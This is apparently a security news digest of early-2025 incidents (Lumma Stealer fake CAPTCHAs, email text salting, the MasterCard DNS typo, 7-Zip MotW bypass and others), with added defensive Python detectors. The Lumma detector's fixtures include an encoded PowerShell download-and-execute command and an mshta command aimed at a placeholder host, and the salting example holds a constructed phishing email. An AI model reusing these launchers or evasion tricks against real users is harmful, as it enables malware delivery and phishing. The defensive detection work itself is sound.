About the Security Content of iOS 18.3 and iPadOS 18.3

Apple released the iOS 18.3 and iPadOS 18.3 security update on January 27, 2025, fixing multiple vulnerabilities in currently supported devices. The fixes cover bugs that could allow unauthorized access to data, denial of service, and privilege escalation. Each fix is tied to a CVE ID; as is Apple's practice, technical details are withheld until the patch is generally available. See the Apple security releases page for the full list.

https://support.apple.com/en-us/122066

Hacker Infects 18,000 “Script Kiddies” With Fake Malware Builder

A fake malware builder, actually a trojanized build of the XWorm RAT, infected roughly 18,000 would-be attackers (“script kiddies”) worldwide; the implant steals data and gives the operator remote control of the infected machine. The trojan was distributed through various platforms and contained a kill switch, which security researchers used to push a mass uninstall command and partially dismantle the botnet. Machines that were offline at the time remain infected. The lesson is the usual one: unsigned tools shared by other criminals should be assumed to be backdoored.

https://www.bleepingcomputer.com/news/security/hacker-infects-18-000-script-kiddies-with-fake-malware-builder/

Seasoning Email Threats With Hidden Text Salting

Cisco Talos reports growing use of hidden text salting in email threats. The sender pads the HTML body with content the recipient never sees: HTML comments, zero-width characters, and elements hidden with CSS (for example display:none, visibility:hidden, or a zero font size). Invisible characters inserted inside a brand name break keyword matching, so a filter looking for the impersonated brand misses it, while hidden filler text in another language confuses language detection and other parsers. Talos recommends detection that examines the message as the recipient would see it, flags suspicious CSS properties, and uses AI-based classification rather than relying on raw-text keyword matching alone.

https://blog.talosintelligence.com/seasoning-email-threats-with-hidden-text-salting/
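The salting technique in the Talos item above, shown as a detector that compares what a tag-stripping keyword filter sees with what the recipient actually sees. This is an added example written for this digest, not code from the Talos post; the sample message, brand list, and the set of CSS properties treated as hiding are constructed for illustration.

```python
"""Hidden text salting: naive keyword view vs. rendered view of an HTML email.
Added example, not code from the Talos post; sample message is constructed."""
import html as htmlmod
import re
from html.parser import HTMLParser

# Inline CSS that makes an element invisible to the recipient (assumed set).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px|pt|em)?\b"
    r"|opacity\s*:\s*0(?:\.0+)?\b", re.I)
# Zero-width and soft-hyphen code points used to split keywords.
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff\u00ad]")
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col", "wbr"}


class VisibleTextExtractor(HTMLParser):
    """Collects text a mail client would render and text it would hide."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: &#8203; arrives as U+200B
        self.visible, self.hidden = [], []
        self._stack = []            # (tag, is_hidden) for open elements
        self._hidden_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        hidden = tag in ("script", "style", "title") or bool(HIDDEN_STYLE.search(style))
        self._stack.append((tag, hidden))
        self._hidden_depth += hidden

    def handle_endtag(self, tag):
        # Tolerate sloppy markup: pop back to the matching open tag, if any.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                self._hidden_depth -= sum(h for _, h in self._stack[i:])
                del self._stack[i:]
                return

    def handle_data(self, data):
        (self.hidden if self._hidden_depth else self.visible).append(data)

    def handle_comment(self, data):
        self.hidden.append(data)    # comments are a common salting carrier


def _find_brands(text, brands):
    norm = re.sub(r"\s+", " ", text).lower()
    return [b for b in brands if b.lower() in norm]


def analyze(message_html, brands):
    """Return naive vs. rendered brand hits plus salting indicators."""
    p = VisibleTextExtractor()
    p.feed(message_html)
    p.close()
    # What a tag-stripping keyword filter sees: hidden spans and zero-width
    # characters are still inline, so a split brand name does not match.
    naive_text = htmlmod.unescape(re.sub(r"<[^>]+>", "", message_html))
    rendered_raw = "".join(p.visible)
    rendered = ZERO_WIDTH.sub("", rendered_raw)
    hidden_text = ZERO_WIDTH.sub("", "".join(p.hidden)).strip()
    naive_hits = _find_brands(naive_text, brands)
    visible_hits = _find_brands(rendered, brands)
    return {
        "naive_hits": naive_hits,
        "visible_hits": visible_hits,
        "zero_width_chars": len(ZERO_WIDTH.findall(rendered_raw)),
        "hidden_chars": len(hidden_text),
        # Salted if invisible content exists or unhiding reveals a brand.
        "salted": bool(hidden_text) or bool(set(visible_hits) - set(naive_hits)),
    }


# Constructed sample: brand split by a display:none span and a zero-width
# space, plus hidden filler text in other languages.
SAMPLE = """<html><body>
<p>Dear customer, your <b>W<span style="display:none">qz</span>ells Fa&#8203;rgo</b>
account has been limited.</p>
<!-- Sehr geehrter Kunde, dies ist Fuelltext zur Verwirrung der Spracherkennung -->
<p style="font-size:0">Ceci est un texte de remplissage invisible.</p>
<p><a href="http://example.invalid/verify">Verify now</a></p>
</body></html>"""
BRANDS = ["Wells Fargo", "PayPal"]

if __name__ == "__main__":
    print(analyze(SAMPLE, BRANDS))
```

The naive view finds no brand at all, while the rendered view finds "Wells Fargo" and reports one zero-width character and over a hundred characters of hidden text; either signal alone is enough to route the message for closer inspection.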

Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection

Netskope Threat Labs describes a global Lumma Stealer campaign, heaviest in telecom but reaching many sectors, that delivers the malware through fake CAPTCHA pages. The page tells the victim to "verify" by pasting a command the site has silently placed on the clipboard into the Windows Run dialog, which moves execution out of the browser and past its download protections. The resulting loaders use obfuscated PowerShell and process hollowing to evade endpoint defenses. Because the delivery chain changes continuously, detection and prevention are difficult; Netskope publishes indicators and describes its own coverage for the campaign.

https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
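The execution chain in the Lumma item above leaves a recognizable trace in process-creation telemetry: a scripting host spawned directly from explorer.exe (where a command pasted into the Run dialog lands) with an encoded, hidden-window command that fetches a remote payload. The detector below is an added example written for this digest, not Netskope's code; the events, the Sysmon-like field names, and the URLs are constructed, and the indicator thresholds are assumptions.

```python
"""Flag fake-CAPTCHA / Run-dialog execution chains in process-creation events.
Added example, not Netskope's code; events and field names are constructed."""
import base64
import re

# Constructed: the command a fake CAPTCHA page would drop on the clipboard,
# base64-encoded over UTF-16LE the way PowerShell -EncodedCommand expects.
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/c.txt')"
_ENCODED = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()

EVENTS = [  # constructed process-creation events (field names assumed)
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -w hidden -ep bypass -enc {_ENCODED}"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/captcha.hta"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
]

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe"}
SUSPICIOUS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|"
    r"Invoke-Expression|https?://|FromBase64String", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return the reasons this event looks like a pasted-command launch."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if image not in LOLBINS:
        return reasons
    # The Run dialog (Win+R) is a child of the shell, so a pasted command
    # shows up as a scripting host whose parent is explorer.exe.
    if parent == "explorer.exe":
        reasons.append("lolbin spawned directly from explorer.exe")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded:
        reasons.append("encoded PowerShell command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", ev["cmdline"], re.I):
        reasons.append("hidden window")
    if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", ev["cmdline"], re.I):
        reasons.append("execution policy bypass")
    text = ev["cmdline"] + (" " + decoded if decoded else "")
    if SUSPICIOUS.search(text):
        reasons.append("remote download / in-memory execution")
    # Require the explorer parent plus at least one more indicator so an admin
    # typing a plain command into Run does not fire on its own (assumed rule).
    return reasons if parent == "explorer.exe" and len(reasons) >= 2 else []


def flagged(events):
    """Map event id -> reasons for every event that scores as suspicious."""
    result = {}
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            result[ev["id"]] = reasons
    return result


if __name__ == "__main__":
    for event_id, reasons in flagged(EVENTS).items():
        print(event_id, reasons)
```

Decoding the -enc argument before matching matters: the URL and the download call are invisible in the raw command line, and a rule that only looks at the literal string would see nothing but base64.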

Subaru Security Flaws Exposed Its System for Tracking Millions of Cars

Security researchers Sam Curry and Shubham Shah found vulnerabilities in Subaru's STARLINK connected-vehicle service that let them track the location of millions of cars, pull up to a year of detailed location history (including visits to sensitive locations), and remotely control vehicle functions. The weaknesses were in the employee-facing administrative portal: flaws in its account handling gave the researchers staff-level access to customer vehicles. Subaru has since fixed the issues, but the researchers point out that legitimately authorized employees can still retrieve the same location history, which is a privacy concern in its own right. Similar flaws have been reported against other automakers, pointing to an industry-wide problem with connected-car data privacy and security.

https://www.wired.com/story/subaru-location-tracking-vulnerabilities/

Major Cybersecurity Vendors’ Credentials Found on Dark Web

Threat intelligence firm Cyble found thousands of credentials belonging to at least 14 major cybersecurity vendors, including McAfee, CrowdStrike, and Palo Alto Networks, offered on dark web markets for as little as $10. The logins cover both internal systems and customer-facing portals. The credentials appear in infostealer logs, meaning they were harvested from compromised employee and customer devices; Cyble argues that monitoring dark web markets for your own organization's credentials lets you revoke them before they are used as the foothold for a larger attack.

https://www.infosecurity-magazine.com/news/cybersecurity-vendors-credentials/

Targeted Supply Chain Attack Against Chrome Browser Extensions

TLDR: On December 26, 2024, Cyberhaven disclosed that its Chrome extension had been trojanized after an attacker phished one of its developers and obtained publishing permissions for the extension's Chrome Web Store account. Sekoia's analysis ties the incident to a wider campaign in which malicious code was injected into a dozen extensions to harvest API keys and session cookies, including those for ChatGPT and Facebook accounts, from hundreds of thousands of users. The report covers the phishing lure, the compromised extensions and versions, and the adversary's infrastructure, and advises users to remove or update affected extensions, rotate any credentials or sessions those extensions could have read, and monitor their accounts for suspicious activity.

https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/

MasterCard DNS Error Went Unnoticed for Years

MasterCard fixed a DNS misconfiguration that had gone unnoticed for nearly five years: one of the nameserver hostnames delegated for its domain contained a typo, so it pointed at a domain nobody owned, and whoever registered that domain could have received a share of MasterCard's DNS queries. Security researcher Philippe Caturegli registered the misspelled domain for about $300 to keep it out of hostile hands. MasterCard said there was no real threat; Caturegli countered that anyone answering those queries could have redirected web and email traffic, enabling man-in-the-middle attacks. He was also criticized for disclosing the issue publicly after reporting it, which raises the question of how companies should acknowledge security mistakes rather than minimize them.

https://krebsonsecurity.com/2025/01/mastercard-dns-error-went-unnoticed-for-years/
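The class of mistake in the MasterCard item above, a delegation to a nameserver whose parent domain is a near miss of the real provider, is cheap to audit: compare each NS hostname's registrable domain against the providers you expect and treat any small edit-distance miss as a probable typo. The audit below is an added example written for this digest, not code from the Krebs article; the zone, nameservers, and provider list are constructed, and the two-label registrable-domain rule is a simplification noted in the code.

```python
"""Audit a zone's NS delegation for nameservers outside the expected provider
domains.  Added example, not from the Krebs article; sample data is constructed."""


def levenshtein(a, b):
    """Edit distance; inputs are short enough that the O(len(a)*len(b)) DP is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(hostname):
    """Last two labels of the name.  Assumption: a real audit should use the
    Public Suffix List, otherwise 'ns1.example.co.uk' maps to 'co.uk'."""
    labels = hostname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def audit_delegation(zone, ns_records, expected_providers, max_distance=2):
    """Return one finding per NS hostname that is not under an expected provider.

    A near miss (edit distance <= max_distance) is reported as a probable typo.
    That is the dangerous case: the misspelled parent domain may be unregistered
    and available to anyone, who would then receive part of the zone's queries."""
    expected = {p.lower() for p in expected_providers}
    findings = []
    for ns in ns_records:
        parent = registrable_domain(ns)
        if parent in expected:
            continue
        closest = min(expected, key=lambda p: levenshtein(parent, p))
        dist = levenshtein(parent, closest)
        findings.append({
            "zone": zone,
            "nameserver": ns,
            "parent_domain": parent,
            "closest_expected": closest,
            "distance": dist,
            "verdict": ("probable typo, check registration"
                        if dist <= max_distance else "unexpected provider"),
        })
    return findings


# Constructed sample: nameservers at the right provider, one with the
# provider's TLD truncated (.net -> .ne, a ccTLD anyone can register in),
# and one at a provider not on the expected list.
ZONE = "example.com"
NS_RECORDS = ["a1-10.ns-provider.net.", "a2-20.ns-provider.net.",
              "a3-30.ns-provider.net.", "a4-40.ns-provider.ne.",
              "ns1.other-dns.example."]
EXPECTED = ["ns-provider.net"]

if __name__ == "__main__":
    for finding in audit_delegation(ZONE, NS_RECORDS, EXPECTED):
        print(finding)
```

For a live check, feed the output of `dig NS <zone> +short` (and, separately, the NS set the parent zone returns, since the two can differ) into audit_delegation; then confirm every flagged parent domain is actually registered to you, not just resolvable.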

Cloudflare Mitigated a Record-breaking 5.6 Tbps DDoS Attack

Cloudflare reports that on October 29, 2024 it mitigated a 5.6 Tbps DDoS attack, the largest on record, launched by a Mirai-variant botnet of about 13,000 devices against an ISP in Eastern Asia. The attack lasted roughly 80 seconds and was detected and mitigated fully autonomously, with no alerts raised and no customer impact. Hyper-volumetric attacks are becoming routine: attacks above 1 Tbps grew sharply quarter over quarter, and most attacks are short bursts of under ten minutes, which leaves no room for manual response. Telecommunications and internet service providers were the most targeted industries, with activity concentrated around peak usage periods, and a growing share of victims reported ransom DDoS demands.

https://www.bleepingcomputer.com/news/security/cloudflare-mitigated-a-record-breaking-56-tbps-ddos-attack/

7-Zip Fixes Bug That Bypasses Windows MoTW Security Warnings, Patch Now

7-Zip has fixed a high-severity vulnerability (CVE-2025-0411) that let attackers bypass Windows Mark of the Web (MotW). Windows tags downloaded files with a Zone.Identifier alternate data stream and warns (via SmartScreen) before running them; 7-Zip failed to propagate that tag to files extracted from a nested archive, so an executable packed inside a double-archived download could be launched without the warning. The fix shipped in 7-Zip 24.09. Because 7-Zip has no auto-update mechanism, many installations are still on vulnerable versions and must be updated manually.

https://www.bleepingcomputer.com/news/security/7-zip-fixes-bug-that-bypasses-the-windows-motw-security-mechanism-patch-now/

AI Tool GeoSpy Analyzes Images and Identifies Locations in Seconds

GeoSpy, an AI tool built by Graylark Technologies for law enforcement, estimates where a photo was taken within seconds from the image content itself (architecture, vegetation, signage), so stripping EXIF metadata from a photo does not protect the subject. Although intended for official use, the tool was publicly accessible and required no training, and it was used to locate individuals from their social media images, including for stalking. The episode raises concerns both about abuse of the capability and about the handling of the private data fed into it. Graylark has restricted public access following reports of misuse.

https://www.malwarebytes.com/blog/news/2025/01/ai-tool-geospy-analyzes-images-and-identifies-locations-in-seconds

Mass Campaign of Murdoc Botnet Mirai: a New Variant of Corona Mirai

TLDR: Murdoc Botnet, a new Mirai variant, exploits known vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, using shell scripts to fetch and run ELF payloads on the compromised devices. Active since at least July 2024, it comprises over 1,300 active IPs and more than 100 command-and-control servers, with infections concentrated in Malaysia, Thailand, Mexico, and Indonesia. Qualys recommends monitoring for suspicious script execution and outbound connections from IoT devices, and patching or replacing the affected models.

https://blog.qualys.com/vulnerabilities-threat-research/2025/01/21/mass-campaign-of-murdoc-botnet-mirai-a-new-variant-of-corona-mirai

Employees Enter Sensitive Data Into GenAI Prompts Too Often

Employees routinely paste sensitive data into generative AI (GenAI) tools: 8.5% of the prompts analyzed in the study cited contained sensitive information. The leading categories were customer data (45.77%), employee data (27%), legal and finance data (14.88%), and sensitive code (5.64%). Organizations therefore face a trade-off between the efficiency gains of GenAI and the risk of exposing confidential data to third-party services. Governance controls such as real-time monitoring of prompts, redaction, and employee training are needed to mitigate that risk while still capturing GenAI's benefits.

https://www.darkreading.com/threat-intelligence/employees-sensitive-data-genai-prompts
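The "real-time tracking" control from the GenAI item above, as it is usually implemented: a proxy in front of the AI service that scans each prompt, redacts low-risk matches, and blocks prompts carrying credentials. The code below is an added example written for this digest, not from the Dark Reading article; the rule set is a minimal starting point, the category names and blocking policy are assumptions, and the sample prompt is constructed.

```python
"""Scan a GenAI prompt for sensitive data and decide whether to forward, redact
or block it.  Added example, not from the article; rules and sample are constructed."""
import re


def luhn_ok(digits):
    """Luhn checksum, used to cut false positives on 13-16 digit numbers."""
    total = 0
    for i, d in enumerate(reversed(digits)):
        n = int(d)
        if i % 2:
            n = n * 2 - 9 if n * 2 > 9 else n * 2
        total += n
    return total % 10 == 0


# (category, pattern, optional validator).  Specific patterns come first so a
# key is never later re-matched as something else.  Categories are assumed.
RULES = [
    ("credential", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), None),           # AWS access key ID
    ("private_key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"), None),
    ("payment_card", re.compile(r"\b\d(?:[ -]?\d){12,15}\b"),
     lambda s: luhn_ok(re.sub(r"\D", "", s))),
    ("email", re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"), None),
    ("national_id", re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), None),          # US SSN layout
]


def scan_prompt(text):
    """Return (redacted_text, sorted list of categories found)."""
    hits = set()
    redacted = text
    for category, pattern, validator in RULES:
        def _sub(m, category=category, validator=validator):
            if validator and not validator(m.group(0)):
                return m.group(0)           # pattern hit but checksum failed
            hits.add(category)
            return f"[{category.upper()} REDACTED]"
        redacted = pattern.sub(_sub, redacted)
    return redacted, sorted(hits)


def gateway(prompt, block_on=("credential", "private_key")):
    """Policy decision for the proxy: block, redact-and-forward, or forward."""
    redacted, cats = scan_prompt(prompt)
    if any(c in block_on for c in cats):
        return {"action": "block", "categories": cats}
    if cats:
        return {"action": "redact", "categories": cats, "prompt": redacted}
    return {"action": "forward", "categories": [], "prompt": prompt}


# Constructed sample prompt mixing customer PII with a cloud credential.
SAMPLE = ("Summarize this ticket: customer jane.doe@example.com paid with card "
          "4111 1111 1111 1111 and the refund failed. Our S3 key is "
          "AKIAIOSFODNN7EXAMPLE if you need to check the bucket.")

if __name__ == "__main__":
    print(gateway(SAMPLE))
```

Blocking rather than redacting on credentials is deliberate: a redacted key still tells you an employee had a live secret in a chat window, so the right response is to rotate it, not just to strip it from the prompt.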
